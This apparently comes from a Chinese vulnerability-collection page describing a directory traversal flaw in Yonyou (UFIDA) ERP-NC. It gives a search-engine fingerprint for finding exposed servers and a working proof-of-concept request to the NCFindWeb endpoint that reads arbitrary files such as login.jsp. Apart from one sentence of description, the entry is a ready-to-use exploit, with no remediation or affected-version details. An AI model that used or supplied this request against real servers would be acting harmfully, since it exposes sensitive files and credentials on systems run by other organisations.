Last updated 3 years ago
Was this helpful?
⽤友ERP-NC 存在⽬录遍历漏洞,攻击者可以通过⽬录遍历获取敏感⽂件信息
⽤友ERP-NC
app="⽤友-UFIDA-NC"
POC为: /NCFindWeb?service=IPreAlertConfigService&filename=
https://ip/NCFindWeb?service=IPreAlertConfigService&filename=login.jsp